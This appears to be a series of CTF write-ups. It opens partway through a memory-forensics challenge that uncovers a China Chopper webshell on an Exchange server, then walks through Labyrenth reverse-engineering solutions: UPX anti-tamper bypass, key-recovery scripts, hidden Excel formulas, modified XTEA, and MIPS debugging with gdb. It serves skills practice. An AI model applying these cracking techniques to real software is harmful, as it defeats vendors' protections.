At last I had reached the final memory image, which was an Exchange Server, & the question was what filename the attackers used to control the server. I'm sure everyone else using a resource-limited VM felt the pain of this 9GB memory image just as I did. It felt as though a generation had passed by the time any of my commands completed. Anyway, back to the task at hand... I knew it was an Exchange server and had no idea where the compromise might have happened. I knew they were trying to control the server, so the first thing I did was run the Netscan command to see if any open connections would get me anywhere.

BOOM... The only external IP was one we had previously seen being used maliciously in the challenge. That's a start, but not much to go off of because it looks like the PID was System.

So the first thing I did was try to keep it simple and create/search through strings of the memory dump for the IP. What I found was several pretty interesting POSTs to a file /owa/error1.aspx.




I thought that was pretty interesting to have POSTs to this file so I then searched for just that file in the strings file.


Well now... that's interesting... After seeing this full post I decided to decode this garbage.


After decoding it I saw that this was actually a webshell that is trying to run remote commands on the server. Now I could safely input this file as the answer.

Answer: error1.aspx

Question #27


In the past I've dealt with several Exchange servers with OWA being owned. The base64-encoded variables & variable names that were used in this particular webshell pointed me towards one particular piece of malware, China Chopper. See https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

Answer: chinachopper

Question #28


This last question was fairly complicated however after decoding the strings I had a starting point. I saw that there was a call to change directories to a "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\" so I began my search there. I didn't have much luck searching through strings so I ended up running MFTParser to see what all was located in that directory.

I found some interesting files located within this directory including the webshell, an earlier found RAR file, a test file, and th3k3y.txt. The last one seemed interesting to me but I ended up running FILESCAN to see if I could carve out all of these files. The only file I found to be resident in memory was the th3k3y.txt so I carved it out. What I found inside of the file was a single string.

eNpzLypyzs/zyS9LLfYtCspPyi9xzEtxKzZIzkwtqVRUVAQAybULlw==

I put it in and sadly... the journey was over...
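As an aside, the walkthrough submits the string from th3k3y.txt as-is. The leading "eNp" is what base64-encoded zlib data typically looks like (it decodes to the bytes 78 da), so a curious reader could try unwrapping it. The sketch below is only a guess at the encoding, not something the challenge asked for.

```python
import base64
import zlib

# The single string found inside th3k3y.txt.
BLOB = "eNpzLypyzs/zyS9LLfYtCspPyi9xzEtxKzZIzkwtqVRUVAQAybULlw=="

raw = base64.b64decode(BLOB)
# A zlib stream normally starts with 0x78; 0xda marks the "best compression" level.
looks_like_zlib = raw[:2] == b"\x78\xda"

# Assumption: the rest of the buffer is a complete zlib stream.
decoded = zlib.decompress(raw) if looks_like_zlib else raw

if __name__ == "__main__":
    print("zlib header present:", looks_like_zlib)
    print(decoded)
```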

Running the Labyrenth: Unit 42 CTF

At least once a year I try to publish my work process for a Capture The Flag (CTF) event. If you're not familiar with CTFs, they're a timed challenge of very difficult or obscure challenges to gain a "flag" to submit for points. Some enjoy these, some feel them a waste of time. At the very least, they're exercises to keep your mind sharp and your skills prepared for the unexpected.

This year, Palo Alto Networks (notably their threat research team Unit 42), put together a great CTF that was open to the public for one month. Uniquely, they offered sizable cash prizes to the first person to win each category of challenges and to the top winners overall.

Categories of challenges were separated between: Windows, Unix, Documents, Mobile, Random, and Threat. While some of these are apparent, and Random was a cool assortment of off-the-wall stuff, Threat was unique for being very abstract problems of pattern analysis and writing YARA rules. Overall, there were nearly 40 challenges woven through the narrative of the excellent film starring David Bowie: Labyrinth.

While a small number were able to complete each and every one of these challenges, I was excited to just do a handful, about 32. What I'll provide here are just a few of those where I feel like I did something unique or profoundly stupid to obtain the answer.




Windows Challenge #1


The first challenge is a 32-bit executable named AntiD.exe that wants a typed-in key and compares it to an encoded value to give a Go/NoGo:



 A quick glance in IDA Pro shows a single subroutine, no strings, and no realistic imports, leading one to believe that this is a packed executable. A hex view of the file shows section names of ".ups0" and ".ups1". A little farther down, at the beginning of the first section, is the text "3.08" followed by "UPX!":

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

000003D0   00 00 00 00 00 00 00 00  00 00 00 33 2E 30 38 00              3.08
000003E0   55 50 58 21 0D 09 02 07  1C B5 B1 22 80 D7 23 65   UPX!     µ±"€×#e
000003F0   81 66 00 00 EE 0F 00 00  00 28 00 00 26 00 00 ED    f  î    (  &  í

Obviously, we think this is UPX packing :) However, UPX fails to unpack it.

Now, just from guessing, I was able to solve this issue within five seconds and move on. Others debugged it manually until it unpacked in memory. The "official" method should've been to note the error message: "CantUnpackException: file is modified/hacked/protected; take care!!!" and review the UPX source code. Look for the error message and work backwards from there:

    if (memcmp(isection[0].name,"UPX",3) == 0)
    {
        ...
    }
    if (is_packed && ih.entry < isection[2].vaddr)
    {
        ...
            if (offset >= 0 && find(buf + offset + 1, sizeof(buf) - offset - 1, magic, 7) >= 0)
                x = true;
        } catch (...) {
            //x = true;
        }
        if (x)
            throwCantUnpack("file is modified/hacked/protected; take care!!!");
        else
            throwCantUnpack("file is possibly modified/hacked/protected; take care!");
        return false;   // not reached
    }


Note here that the routine starts with a check to see if the first three bytes of the section name are literally "UPX". If not, start throwing errors. By simply changing "ups" to "UPX", the file can instantly be unpacked for analysis. This is the guessing part that I did in five seconds.
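The rename can be done in a hex editor, but for illustration here is a minimal sketch that patches the section names in the PE section table. It assumes a well-formed PE file and simply swaps the bytes "ups" for "UPX" inside each 8-byte section name; the function name `rename_sections` is made up for this example.

```python
import struct

def rename_sections(pe_bytes, old=b"ups", new=b"UPX"):
    """Return a copy of pe_bytes with `old` replaced by `new` in section names."""
    if len(old) != len(new):
        raise ValueError("old and new must be the same length")
    buf = bytearray(pe_bytes)
    # e_lfanew at 0x3C points to the "PE\0\0" signature.
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if bytes(buf[e_lfanew:e_lfanew + 4]) != b"PE\x00\x00":
        raise ValueError("not a PE file")
    # COFF header follows the signature: NumberOfSections at +6,
    # SizeOfOptionalHeader at +20 (both relative to the signature).
    (num_sections,) = struct.unpack_from("<H", buf, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", buf, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    for index in range(num_sections):
        offset = table + index * 40          # each section header is 40 bytes
        name = bytes(buf[offset:offset + 8])  # name is the first 8 bytes
        buf[offset:offset + 8] = name.replace(old, new)
    return bytes(buf)

# Usage sketch (file names are placeholders):
#   patched = rename_sections(open("AntiD.exe", "rb").read())
#   open("AntiD_fixed.exe", "wb").write(patched)
```

Work on a copy of the sample, then point UPX at the patched file.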



Once you're in the executable, it's a straightforward matter of finding the data and the encoding routine. This routine, below, takes the input values, does math on it, and checks each byte against an encoded set of bytes.



Each byte is XORed with 0x33, has 0x44 added, is XORed with 0x55, has 0x66 subtracted, and is finally XORed again with an incremental value. That last part makes it extremely difficult to reverse the routine, as we'd have to brute force that value. Since the routine is simple, the easiest method is to just brute force from the beginning. We can do this byte-by-byte:


#!/usr/bin/env python
key=(0x8C,0xF1,0x53,0xA3,0x08,0xD7,0xDC,0x48,
0xDB,0x0C,0x3A,0xEE,0x15,0x22,0xC4,0xE5,
0xC9,0xA0,0xA5,0x0C,0xD3,0xDC,0x51,0xC7,
0x39,0xFD,0xD0,0xF8,0x3B,0xE8,0xCC,0x03,
0x06,0x43,0xF7,0xDA,0x7E,0x65,0xAE,0x80)

def crack(guess):
    v2 = 0
    for i in range(0, len(guess)):
        v4 = ord(guess[i]) ^ 0x33
        v5 = (v4 + 0x44) & 0xFF
        v6 = v5 ^ 0x55
        v7 = (v6 - 0x66) & 0xFF
        v8 = v7 ^ (v2 & 0xFF)
        if not v8 == key[i]:
            return False
        v2 += v8
    return True

code = "PAN{"
for pos in range(4, len(key)):
    for char in range(32, 127):
        tmp = crack(code + chr(char))
        if tmp:
            code = code + chr(char)
            break
print(code)

This will print out the flag:

PAN{C0nf1agul4ti0ns_0n_4_J08_W3LL_D0N3!}
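One observation, going only by the Python model of the routine above: the incremental value is the running sum of the encoded bytes that have already matched, and those are all sitting in the key array. If that model is faithful to the binary, each byte can be walked backwards directly, with no guessing. The sketch below is that alternative; `decode` is a name invented for the example.

```python
KEY = (0x8C, 0xF1, 0x53, 0xA3, 0x08, 0xD7, 0xDC, 0x48,
       0xDB, 0x0C, 0x3A, 0xEE, 0x15, 0x22, 0xC4, 0xE5,
       0xC9, 0xA0, 0xA5, 0x0C, 0xD3, 0xDC, 0x51, 0xC7,
       0x39, 0xFD, 0xD0, 0xF8, 0x3B, 0xE8, 0xCC, 0x03,
       0x06, 0x43, 0xF7, 0xDA, 0x7E, 0x65, 0xAE, 0x80)

def decode(key):
    """Undo the five steps in reverse order for every encoded byte."""
    out = []
    running = 0                        # sum of encoded bytes seen so far
    for enc in key:
        v7 = enc ^ (running & 0xFF)    # undo the final XOR
        v6 = (v7 + 0x66) & 0xFF        # undo the subtraction
        v5 = v6 ^ 0x55                 # undo the second XOR
        v4 = (v5 - 0x44) & 0xFF        # undo the addition
        out.append(chr(v4 ^ 0x33))     # undo the first XOR
        running += enc
    return "".join(out)

if __name__ == "__main__":
    print(decode(KEY))
```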

Windows Challenge #4


This challenge gave quite a few people issues, and frustrated me for a while. This is a GUI application that asks for input and gives a Go/NoGo.



Opening up the file in IDA Pro, we look for DialogFunc(), look for typed input to be read with GetDlgItemText(), and work from there. This routine starts with loading a whole set of encoded values into an array using obscure movdqa routines. It then does some obtuse methods for determining the correct length of the input, 32 bytes:

        v25 = -1;
        do
          ++v25;
        while ( GUESS[v25] );
        if ( v25 >= 32 )

If so, the typed value is parsed to ensure that each byte is either a 1, 2, or 3:

        while ( GUESS[pos2] - 0x31 <= 2 )
        {
          ...
        }


The value is then passed into a validation routine. This routine does something with every two bytes, something I spent too much time trying to understand, before I just skipped it entirely. It's just an initial Go/NoGo on the typed value, so we'll force it to Go each time. Once done, it'll add up each number of the value and create a total sum:

        do
        {
          ++pos;
          sum_of_serial += GUESS[pos] - 0x30;
        } while (pos < guess_len);

From there, we see that each number of the typed value is XOR by the sum_of_serial, and XOR again by the respective byte of the array of encoded values. It doesn't even check the values. If the earlier validation routine is correct, it'll print whatever here, even wrong answers.

So we don't know the valid serial number to pass that earlier routine, we don't want to figure out that earlier routine, and we don't know the valid sum of digits. That latter part we can work out easily, though, by working through the expected flag of "PAN{}"

"P" (0x50) XOR "encoded_byte0" (0x27) = 0x77
That first byte can then be either a 1, 2, or 3. So XOR 0x77 by each:
0x31 (1) XOR 0x77 = 0x46 (70)
0x32 (2) XOR 0x77 = 0x45 (69)
0x33 (3) XOR 0x77 = 0x44 (68)

Our sum is one of those three values. By doing the same down the line ("A" against the second encoded byte, "N" against the third), we see only one sum value working: 0x44 (68). Yay!
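The elimination above is easy to automate. The sketch below intersects the candidate sums for each character of the known "PAN{" prefix, using the first four encoded bytes from the array; the helper name `candidate_sums` is invented for the example.

```python
KNOWN_PREFIX = "PAN{"
ENCODED = (0x27, 0x34, 0x38, 0x0E)   # first four encoded bytes
DIGITS = (0x31, 0x32, 0x33)          # ASCII '1', '2', '3'

def candidate_sums(prefix, encoded):
    """Keep only the sum values that work for every known character."""
    candidates = None
    for ch, enc in zip(prefix, encoded):
        # flag_char = digit ^ sum ^ enc  =>  sum = flag_char ^ enc ^ digit
        options = {ord(ch) ^ enc ^ digit for digit in DIGITS}
        candidates = options if candidates is None else candidates & options
    return candidates

if __name__ == "__main__":
    print([hex(value) for value in sorted(candidate_sums(KNOWN_PREFIX, ENCODED))])
```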

Now what? We know the sum, but we still don't know the encoded serial number. All we know is that each value is a 1, 2, or 3. So... guess?

I wrote a program to just guess the byte for each and print to an array. From there, pick out the values that make sense.


#!/usr/bin/env python
"""
000000000025EEB0 27 00 00 00 34 00 00 00 38 00 00 00 0E 00 00 00 '...4...8.......
000000000025EEC0 36 00 00 00 47 00 00 00 19 00 00 00 11 00 00 00 6...G...........
000000000025EED0 07 00 00 00 43 00 00 00 40 00 00 00 03 00 00 00 ....C...@.......
000000000025EEE0 1A 00 00 00 14 00 00 00 23 00 00 00 47 00 00 00 ........#...G...
000000000025EEF0 1A 00 00 00 19 00 00 00 04 00 00 00 29 00 00 00 ............)...
000000000025EF00 17 00 00 00 02 00 00 00 13 00 00 00 12 00 00 00 ................
000000000025EF10 0F 00 00 00 2A 00 00 00 0E 00 00 00 46 00 00 00 ....*.......F...
000000000025EF20 20 00 00 00 01 00 00 00 44 00 00 00 29 00 00 00 .......D...)...
000000000025EF30 04 00 00 00 1A 00 00 00 1A 00 00 00 03 00 00 00 ................
000000000025EF40 10 00 00 00 13 00 00 00 28 00 00 00 02 00 00 00 ........(.......
000000000025EF50 1D 00 00 00 12 00 00 00 28 00 00 00 04 00 00 00 ........(.......
000000000025EF60 13 00 00 00 41 00 00 00 1B 00 00 00 29 00 00 00 ....A.......)...
000000000025EF70 2A 00 00 00 07 00 00 00 05 00 00 00 39 00 00 00 *...........9...
000000000025EF80 17 00 00 00 3B 00 00 00 44 00 00 00 3B 00 00 00 ....;...D...;...
000000000025EF90 0B 00 00 00 00 00 00 00
"""
keys=(0x27,0x34,0x38,0x0E,0x36,0x47,0x19,0x11,
0x07,0x43,0x40,0x03,0x1A,0x14,0x23,0x47,
0x1A,0x19,0x04,0x29,0x17,0x02,0x13,0x12,
0x0F,0x2A,0x0E,0x46,0x20,0x01,0x44,0x29,
0x04,0x1A,0x1A,0x03,0x10,0x13,0x28,0x02,
0x1D,0x12,0x28,0x04,0x13,0x41,0x1B,0x29,
0x2A,0x07,0x05,0x39,0x17,0x3B,0x44,0x3B,
0x0B)

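sum_value = 0x44
result1 = list()
result2 = list()
result3 = list()
print('\n' + hex(sum_value) + ' ' + '=' * 50)
for i in keys:
    # Try each possible serial digit ('1', '2', '3') against every encoded byte
    result1.append(i ^ sum_value ^ 0x31)
    result2.append(i ^ sum_value ^ 0x32)
    result3.append(i ^ sum_value ^ 0x33)

# One output row per candidate digit
print('1 ' + ''.join(chr(i) for i in result1))
print('2 ' + ''.join(chr(i) for i in result2))
print('3 ' + ''.join(chr(i) for i in result3))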

This resulted in:

1 RAM{C2ldr65voaV2olq\bwfgz_{3Ut1\qoovef]whg]qf4n\_rpLbN1N~
2 QBNx@1ogq56ulbU1lor_atedy\x0Vw2_rllufe^tkd^re7m_\qsOaM2M}
3 PCOyA0nfp47tmcT0mns^`udex]y1Wv3^smmtgd_uje_sd6l^]prN`L3L|

By process of elimination, we can start throwing out invalid characters, keep in spaces ("_") where appropriate, and try to piece out words. That's right, it's time to play!





After ten minutes, my first attempt worked out awesome:

 AM{C2ldr65voaV2olq bwfgz_ 3Ut1 qoovef whg qf4n\_rpLbN1N 
  N @1ogq56ulbU1lor_atedy x0Vw2_rllufe tkd re7m_\qsOaM2M}
P   A0nfp47tmcT0mns  udex y1Wv3 smmtgd_uje_sd6l ]prN`L3L 

PAN{C0ngr47ulaT1ons_buddy_y0Uv3_rooted_the_se4m__pr0aN3L}
312113321332213213321332213213322113133213332122


Congratulations buddy you've rooted the seam .. proanel?



Something's not quite right. Then you realize that the serial is shorter than the flag, so it wraps around and gets reused from the start. The first part is obvious, so all we need is the first 32 bytes of the serial: 31211332133221321332133221321332

Input that, and you get the whole flag.
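For anyone who would rather not retype the serial into the challenge, the same decode can be done offline. This is a sketch under the assumptions already made above: the sum is 0x44, the serial is the 32-character string just given, and it repeats once exhausted. The `decode` helper is my own name.

```python
keys = (0x27, 0x34, 0x38, 0x0E, 0x36, 0x47, 0x19, 0x11,
        0x07, 0x43, 0x40, 0x03, 0x1A, 0x14, 0x23, 0x47,
        0x1A, 0x19, 0x04, 0x29, 0x17, 0x02, 0x13, 0x12,
        0x0F, 0x2A, 0x0E, 0x46, 0x20, 0x01, 0x44, 0x29,
        0x04, 0x1A, 0x1A, 0x03, 0x10, 0x13, 0x28, 0x02,
        0x1D, 0x12, 0x28, 0x04, 0x13, 0x41, 0x1B, 0x29,
        0x2A, 0x07, 0x05, 0x39, 0x17, 0x3B, 0x44, 0x3B,
        0x0B)

SUM_VALUE = 0x44
serial = "31211332133221321332133221321332"


def decode(keys, serial, sum_value):
    # The serial is shorter than the flag, so index it modulo its length.
    return "".join(
        chr(k ^ sum_value ^ ord(serial[i % len(serial)]))
        for i, k in enumerate(keys)
    )


flag = decode(keys, serial, SUM_VALUE)
print(flag)
```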

... I was close ...




Docs Challenge #5


As you'd gather from the name, the Docs track was about various document formats. Most centered around finding pseudo-encryption buried within a document, reversing it, and getting the decrypted key out. Challenge 5, however, was a bit more fun.


Running the standard oletools suite against the file showed very little of interest. Just a workbook with three sheets:


E:\CTF\PaloAlto\Docs\5\Calc>oledir.py calc.xls
oledir 0.50 - http://decalage.info/python/oletools
OLE directory entries in file calc.xls:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |2    |4C      |12096
1   |<Used>|Stream |Workbook              |18   |-    |-    |2       |36567
2   |<Used>|Storage|_VBA_PROJECT_CUR      |1    |16   |14   |0       |0
3   |<Used>|Storage|VBA                   |-    |-    |7    |0       |0
4   |<Used>|Stream |dir                   |-    |-    |-    |0       |551
5   |<Used>|Stream |Sheet1                |4    |6    |-    |9       |991
6   |<Used>|Stream |Sheet2                |-    |-    |-    |19      |991
7   |<Used>|Stream |Sheet3                |5    |9    |-    |29      |991
8   |<Used>|Stream |__SRP_0               |-    |-    |-    |39      |1677
9   |<Used>|Stream |__SRP_1               |8    |11   |-    |54      |198
10  |<Used>|Stream |__SRP_2               |-    |-    |-    |58      |762
11  |<Used>|Stream |__SRP_3               |10   |12   |-    |64      |156
12  |<Used>|Stream |ThisWorkbook          |-    |13   |-    |67      |1408
13  |<Used>|Stream |_VBA_PROJECT          |-    |-    |-    |7D      |2682
14  |<Used>|Stream |PROJECT               |3    |15   |-    |A7      |545
15  |<Used>|Stream |PROJECTwm             |-    |-    |-    |B0      |104
16  |<Used>|Stream |\x05SummaryInformation|-    |17   |-    |B2      |224
17  |<Used>|Stream |\x05DocumentSummaryInf|-    |-    |-    |B6      |308
    |      |       |ormation              |     |     |     |        |
18  |<Used>|Stream |\x01CompObj           |-    |-    |-    |BB      |107
19  |unused|Empty  |                      |-    |-    |-    |0       |0


Searching for VBA macros showed only one script, as minor as it was:

E:\CTF\PaloAlto\Docs\5\Calc>olevba.py calc.xls --decode
olevba 0.50 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:M-S-H--- calc.xls
===============================================================================
FILE: calc.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: calc.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub excelulate()
    Application.Quit
End Sub


There's really not that much here from a static perspective. Opening it up shows three sheets: two blank and one with a simple flag verifier:



I then spent hours poking at this document, which eventually led to throwing random tools at it, which eventually led to just randomly clicking around Excel. That led to the discovery of a hidden sheet named "secret". While this sheet looks blank, it contains various cells with Excel formulas in white-on-white text. Changing the text color shows a formula-based "script" that prompts the document to open an incrementing number of calculators for each failed attempt:



Well, there's still no flag functionality. There's also a reference to a cell of "supersecret!F13". If there's one hidden page, what about another? Using VBE, we can iterate through the sheets and make them visible:




Upon doing so, another sheet appears: supersecret

This sheet contains our sought-after character decoding routines, strewn about in various cells:



Each of these fields has a long stretch of text and a four-letter 'key'. The position of that key, as an ASCII char, is the decoded byte. The final cell, F13, takes the concatenation of all these characters and compares them to the input text field on the first sheet. First off, let's see what these fields actually show by turning off formulas:



Well, there's our flag spread about. We could try to work with the formula to reverse the key:

=RETURN(EXACT(CONCATENATE(D7,A5,C5,B4,E20,B6,A8,B8,A12,B10,E10,C9,B13,D12,C11,B16,A25,A18,B19,C20,B21,B2,D23,B24,E4,B26,D16,A21,C14,A16),Sheet1!B3))

However, it's just as easy to modify it. Remove the "RETURN" and "EXACT" wrappers (along with the Sheet1!B3 comparison argument) and you're left with a single CONCATENATE that shows the flag:



Bit Bucket


There are a few other cool things I'll just call out with little context:


Windows Challenge #8

This challenge was a Windows device driver that was my nemesis. Mostly because I tried for too long to dynamically solve it and, in a drunken state, installed WinDbg on my Windows 10 host. This caused numerous memory issues, crashed VMware every time it started, and left me spending two days trying to restore my system back to normal. Then another two weeks trying to figure out why hitting Prt Scrn would instantly freeze my system (it was due to the debugger).

It had a number of great messages, including the flag!




Unix Challenge #3

This was one of those weird challenges that was solved within minutes, only because that morning a coworker had sent a link to a cool obfuscation method which I thought would be great for a CTF. And here it was. REpsych.

REpsych is a cool tool that creates an executable where the graph view in IDA Pro creates a message. The limitation here is that it will only work in IDA Pro, which is kind of a cheap shot for some. At least you can use the free IDA to get it.

Others found a trace to "repsych.asm" in the file, which was the major clue. I found it by working through the error messages:



Seeing that, I kept expanding the upper limit in IDA to show more nodes.



Once reached, the answer popped out:



Unix Challenge #6

In this challenge you were given a client and server app compiled in Go. One issue that others noted afterward was that IDA refused to decompile it because of the unknown type sizes with Go:


For an unknown reason, this is resolved by setting the size of Int from 8 to 4. I don't know why, but blind guessing through the values made it work.



Windows Challenge #7

In this challenge you were given a program that reads the contents of an arbitrary "file.txt", encrypts it, and transmits it over the network. You receive the program and the PCAP and are told to determine the flag that was transmitted. This one was fairly straightforward. After retrieving the bytes out of each frame, it turned out the flag had been Base64 encoded with a custom alphabet and then run through an encryption routine:

  v13 = 0xBADA55;
  delta = 0x9E3769B9;
  v12 = 0x4913092;
  v11 = 0x12345678;
  v10 = 0xDEADBEEF;
  v8 = *data;
  v7 = *(data + 4);
  sum = 0;
  for ( i = 0; i < num_rounds; ++i )
  {
    v8 += (*(key[sum & 3]) + sum) ^ (v7 + ((v7 >> 5) ^ 16 * v7));
    v13 += 4092;
    for ( j = 8; j < 32; ++j )
    {
      v11 *= 8;
      v13 -= 64;
      v12 -= 8;
    }
    v10 = 64;
    sum += delta + 0x1000;
    v7 += (*(key[(sum >> 11) & 3]) + sum) ^ (v8 + ((v8 >> 5) ^ 16 * v8));
  }


As with any unique encryption routines, focus on the hardcoded seed values. However, these show up with very few results. The value of 0x9E3769B9 refers to a thread on the Rune Server forum where there's a discussion of modifying an encryption routine to allow unique clients. If you take that function name (method248()) and search for the rest of the reversed Rune Server source code, you find that this is eXtended Tiny Encryption Algorithm (XTEA) with the value changed from the standard 0x9E3779B9.

Now we know it's what appears to be a custom XTEA encryption.**
** Update: As my good friend Dan Dash pointed out, the seed of 0x9E3769B9 is 0x1000 short of the expected delta, which is added back in at the bottom. This is standard XTEA with just a small change to keep automated tools from seeing it.
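To make that concrete, here is a minimal Python sketch of standard XTEA on one 64-bit block, plus a check that the split constant adds back up to the usual delta. The key, the block values, and the default of 32 rounds are placeholders of mine; the write-up does not give the real key or round count, and the custom Base64 layer is not covered here.

```python
MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9  # standard XTEA constant

# The challenge splits the constant: 0x9E3769B9 plus 0x1000 each round.
assert (0x9E3769B9 + 0x1000) & MASK == DELTA


def _mix(v, s, k):
    # Shared XTEA round function; callers mask the result to 32 bits.
    return ((((v << 4) & MASK) ^ (v >> 5)) + v) ^ (s + k)


def xtea_encrypt(v0, v1, key, rounds=32):
    s = 0
    for _ in range(rounds):
        v0 = (v0 + _mix(v1, s, key[s & 3])) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + _mix(v0, s, key[(s >> 11) & 3])) & MASK
    return v0, v1


def xtea_decrypt(v0, v1, key, rounds=32):
    # Start from the final sum and undo each round in reverse order.
    s = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - _mix(v0, s, key[(s >> 11) & 3])) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - _mix(v1, s, key[s & 3])) & MASK
    return v0, v1


# Hypothetical key and block, only to show the round trip.
demo_key = (1, 2, 3, 4)
block = (0x01234567, 0x89ABCDEF)
print(xtea_decrypt(*xtea_encrypt(*block, demo_key), demo_key) == block)
```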

Overall, great fun and a great set of challenges by Palo Alto Networks Unit 42! Thanks!

And to David Bowie:



Exploring the Labyrenth (2017 Edition)

2017 brings us one of the best, though newest, CTFs: Palo Alto's LabyREnth. The 2016 iteration was a grueling set of three dozen challenges across multiple topics that tested one's ability, skill, patience, and endurance.

2017's challenge one-upped the previous one with a fully explorable, rogue-style text world in which one could wander to find challenges. It's not at the level of ROM MUD or ZZT, two of my largest time sinks when I was young, but at a fun level where one could explore, see the sights, and have a humorous romp through a landscape influenced by David Bowie's film masterpiece, Labyrinth.




There are certain sections that are locked off by challenges; progression is only possible through successful completion of challenges. I was happy to get a pretty large chunk mapped out, though:


Each successful challenge also granted additional equipment to assist in combating the final boss. In a virtual sense; you can't fight him until you beat all other challenges anyhow. But, it was fun to track the equipment being given:



With that, on to the challenges. There were six categories of challenges again this year: Binary, Docs, Threat, Programming, Mobile, and Random. The Random challenges were sprinkled around the world and hidden behind riddles (highlighted in orange in the map above).

My goal for the year was to complete one entire track (Binary) and to get at least one challenge in each other category. With that, here were some interesting ones I ran into.

Mobile 2 - MIPS


Hint: RouterLocker is free encryption software for securing your router. Thank you, in advance, for purchasing RouterLocker.
Author(s): int0x80

I had some upfront warning that this challenge was coming from int0x80 and I made sure that I got to it during the competition. MIPS was completely unknown to me, let alone how to analyze, debug, or even run it. And I had less than two days open on my schedule to get it done. This was going to be an uphill climb.

routerlocker: ELF 32-bit MSB executable, MIPS, MIPS64 version 1, dynamically linked (uses shared libs), for GNU/Linux 2.6.26, with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70401, not stripped

This challenge began with static analysis using IDA Pro, and opening every manual I could find on MIPS programming to understand what I'd be looking at.

As a first step, looking for resolved strings was slightly unfruitful. The strings shown were for output messages, but none for actual program functionality, as shown below. The program clearly looks for a file, and the strings reference that action, but no string suggested a filename.



Going off the clue of it looking for a file, we look for any file reading function calls and see fopen() being used.


Wow, what a right mess. After a call to ptrace(), we see a big chunk of data being constructed to be passed into fopen(). This is our file name, which is a stack string with irregular offsets. Converting the hex to strings, below, and putting the pieces together in a hex editor shows the filename is /tmp/router.lck. We also proved this later in dynamic analysis.
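The same reassembly can be scripted instead of done in a hex editor. In the sketch below the stack offsets and the store order are invented for illustration; only the resulting filename comes from the analysis. The immediates are simply the big-endian 32-bit words that spell it out.

```python
import struct

# Hypothetical (stack offset, 32-bit immediate) pairs, in the shuffled order
# the code might store them. The offsets are made up for this example.
stores = [
    (0x28, 0x7465722E),
    (0x20, 0x2F746D70),
    (0x2C, 0x6C636B00),
    (0x24, 0x2F726F75),
]

base = min(offset for offset, _ in stores)
buf = bytearray(max(offset for offset, _ in stores) - base + 4)
for offset, word in stores:
    # ">I" is a big-endian unsigned 32-bit value, matching the MSB MIPS target.
    struct.pack_into(">I", buf, offset - base, word)

# The string ends at the first NUL byte.
filename = bytes(buf).split(b"\x00", 1)[0].decode("ascii")
print(filename)
```

Writing each word at its offset, rather than concatenating in code order, is what handles the irregular layout.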



Further analysis of the operations that lead to a successful end shows that the data from this file is read, processed mathematically in sequence, and then used to verify a correct pass. This routine, with some of my basic notes, is shown below. However, from a static standpoint we can identify some weaknesses in this routine. For one, there is no block or string-based comparison. Instead, each byte is checked one-by-one with an exit clause if any single byte fails. So all we need to do is figure out each byte in order, not a full set of bytes.



Immediately before this algorithm is another set of data being constructed into an array in variable order, which is likely our "pad" for decrypting the data in the file:



One could do this entire challenge statically using this data and working backwards through the routine. But, I'd like to learn how to do this dynamically to learn how these files are run. And that would require a MIPS environment to run in. This was not easily done, but after hours of scouring websites and write-ups, I was able to find effective methods to create the environment and execute the challenge.

The initial step was to install QEMU and find a MIPS image. A proper Debian compiled version was located on Debian servers. Using the Wheezy hard drive image (qcow) and vmlinux-3.2.0-4-5kc-malta, I followed the steps by Aurélien Jarno to make a functional VM. Once booted, I lacked copy/paste abilities, so I just uploaded the routerlocker challenge to my website and downloaded into the VM. Running it gave the expected output of failure: "License file not found." and "Lock it up, and lock it out."

First step was to install and run strace to track execution. strace by itself gave no usable output, not even the file being read, but running it in File Open and File Access mode showed what I needed:



For much of the remainder, I'll apologize in advance. I had never used gdb before and so I spent a few hours that Sunday night learning how, and tripping over myself in mistakes. I was also working in a VM with an _incredibly_ slow screen write rate (half a second per line of text) and no copy-paste. I'll try to transcribe and show steps here, but most items will be shown as screenshots.

After learning the entry point below, I set additional breakpoints of where I should be based upon static analysis:

(gdb) info files

Symbols from "/root/routerlocker"

Local exec file:

'/root/routerlocker', file type elf32-tradbigmips.
Entry point: 0x400780
0x00400154 - 0x00400161 is .interp
.... Removed for brevity ...
0x00411130 - 0x00411150 is .bss

(gdb) break *0x400780
Breakpoint 1 at 0x400780
(gdb) break *0x400b1c (start of parsing data)
Breakpoint 2 at 0x400b1c
(gdb) break *0x400d18 (read data strlen)
Breakpoint 3 at 0x400d18
(gdb) r (run program)
Starting program: /root/routerlocker

Breakpoint 1, 0x00400780 in _ftext ()
(gdb) c (continue execution)
Continuing.
License file not found.
Lock it up, and lock it out.
[Inferior 1 (process 2578) exited normally]


WTF? It hit my first bp and didn't even touch the latter two. As it turns out, there's a reason for that. Immediately after starting, the challenge runs fork() to split itself between two processes. More research showed that gdb was following the parent process and not the spawned child process. This is easily solved by running "set follow-fork-mode child" and re-running the program. Doing so yielded my second breakpoint!

Breakpoint 1, 0x00400780 in _ftext ()
(gdb) c
Continuing.
[New process 2610]
[Switching to process 2610]

Breakpoint 2, 0x00400b1c in main ()


OK, now we're set to start attacking the routine. We'll need to seed the router.lck file with data that we can trace to see how it's manipulated. The first step is to determine how big our data should be. This is actually shown up front as the program reads in 29 bytes from the file:



I seeded my data with PAN{1234567890abcdefghijklmnop}, then made sure I could find that in memory once run. Using 'i r' to display registers, I found the data being read into a pointer held in v0. Using 'x' to display the first DWORD, I saw 0x50414e7b ("PAN{"), then used 'x/16' to display 16 DWORDs and view the rest:


